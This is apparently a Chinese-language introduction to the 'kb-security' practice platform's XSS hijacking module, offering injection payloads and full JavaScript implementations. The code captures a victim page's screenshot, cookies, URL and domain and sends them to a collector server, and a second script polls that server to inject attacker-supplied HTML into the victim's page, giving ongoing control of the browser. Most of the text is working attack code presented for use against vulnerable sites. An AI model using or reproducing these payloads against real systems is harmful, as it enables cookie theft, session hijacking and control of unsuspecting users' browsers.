安全平台介绍
身处互联网浪潮中的弄潮儿们,你是否了解那潮水中的暗流(安全漏洞)?
你是否已经掌握了安全知识,但苦于无的放矢,而渐渐淡忘?
你是否对黑客技术痴迷,却苦于无处着手?
今天,给大家推荐一个工具:kb-security
-
深入的理论讲解
-
丰富的实战操作
-
平台化的演练耙场
开源项目地址: kb-security ,如果能帮到你,请帮忙点个星。谢谢~
kb-security 是一站式的解决方案:深入的理论讲解、丰富的实战操作、平台化的演练耙场…助你,解锁“安全技术包”。
XSS攻击劫持平台简介
XSS攻击平台主要用于帮助用户更好的完成XSS攻击和控制受害者客户端。当你发现一个网站有XSS安全漏洞,却不知道怎么利用时,这里有一站式的解决方案,帮你完美劫持受害者网站。
- 截屏攻击
用途:主要用于获取受害者的:站点、请求url、cookie、页面内容
- 当发现网站存在script标签注入漏洞时,注入如下代码:
<script type='text/javascript' src='http://localhost:8080/api/xss/screen.js?id=xxx'/>
- 当发现网站存在img标签注入漏洞时,注入如下代码:
<img src='1' onerror=document.body.appendChild(document.createElement('script')).src='http://localhost:8080/api/xss/screen.js?id=xxx'/>
攻击效果如下图所示:
攻击代码实现原理:
```
let head_screen = document.getElementsByTagName('head')[0]
let script_screen = document.createElement('script')
let xssInfo_screen = {
img: null,
cookie: null,
domain: null,
url: null,
}
script_screen.type = 'text/javascript'
script_screen.onload = script_screen.onreadystatechange = function () {
if (window.onload == null) {
setTimeout(ajax_xss, 1000)
}
window.onload = function () {
this.ajax_xss()
}
}
script_screen.src = 'https://xsspt.com/js/html2canvas.js'
head_screen.appendChild(script_screen)
function ajax_xss () {
html2canvas(document.body).then(canvas => {
try {
xssInfo_screen.img = escape(canvas.toDataURL())
} catch (e) {
console.log('截图异常!')
xssInfo_screen.img = ''
}
try {
xssInfo_screen.url = escape(document.location.href)
} catch (e) {
console.log('获取url异常!')
xssInfo_screen.url = ''
}
try {
xssInfo_screen.cookie = escape(document.cookie)
} catch (e) {
console.log('获取cookie异常!')
xssInfo_screen.cookie = ''
}
try {
xssInfo_screen.domain = escape(document.domain)
} catch (e) {
console.log('获取domain异常!')
xssInfo_screen.domain = ''
}
let ajax = new XMLHttpRequest()
ajax.open('POST', 'http://localhost:8080/api/xss/screen', true)
ajax.setRequestHeader('Content-type', 'application/x-www-form-urlencoded')
ajax.send(JSON.stringify(xssInfo_screen))
ajax.onreadystatechange = function () {
if (ajax.readyState == 4 && ajax.status == 200) {
console.log('执行结果:' + ajax.responseText)
}
}
})
}
- 命令行攻击
用途:主要用于获取受害者的:站点、请求url、cookie、劫持用户客户端
- 当发现网站存在script标签注入漏洞时,注入如下代码:
<script type='text/javascript' src='http://localhost:8080/api/xss/command.js'/>
- 当发现网站存在img标签注入漏洞时,注入如下代码:
<img src='1' onerror=document.body.appendChild(document.createElement('script')).src='http://localhost:8080/api/xss/command.js'/>
攻击效果如下图所示:
攻击代码实现原理:
let head = document.getElementsByTagName('head')[0]
let script_jquery = document.createElement('script')
let onload_is_null = false
let xssInfo = {
cookie: null,
domain: null,
url: null,
}
let timer
script_jquery.type = 'text/javascript'
script_jquery.src = 'https://code.jquery.com/jquery-3.1.1.min.js'
head.appendChild(script_jquery)
script_jquery.onload = function () {
if (window.onload == null) {
onload_is_null = true
setTimeout(ajax_xss, 1000)
}
window.onload = function () {
this.ajax_xss()
}
}
function ajax_xss () {
try {
xssInfo.url = escape(document.location.href)
} catch (e) {
console.log('获取url异常!')
xssInfo.url = ''
}
try {
xssInfo.cookie = escape(document.cookie)
} catch (e) {
console.log('获取cookie异常!')
xssInfo.cookie = ''
}
try {
xssInfo.domain = escape(document.domain)
} catch (e) {
console.log('获取domain异常!')
xssInfo.domain = ''
}
$.ajax({
url: 'http://localhost:8080/api/xss/command',
type: 'GET',
dataType: 'jsonp',
data: xssInfo,
success: function (data) {
if (timer == undefined) {
timer = window.setInterval(() => {
let form = {
id: data.data
}
$.ajax({
url: 'http://localhost:8080/api/xss/command',
type: 'GET',
dataType: 'jsonp',
data: form,
success: function (data) {
$('body').append(data.data)
// console.log('JSONP_DATA:' + JSON.stringify(data))
}
})
}, onload_is_null ? 1000 : 2000)
}
}
})
}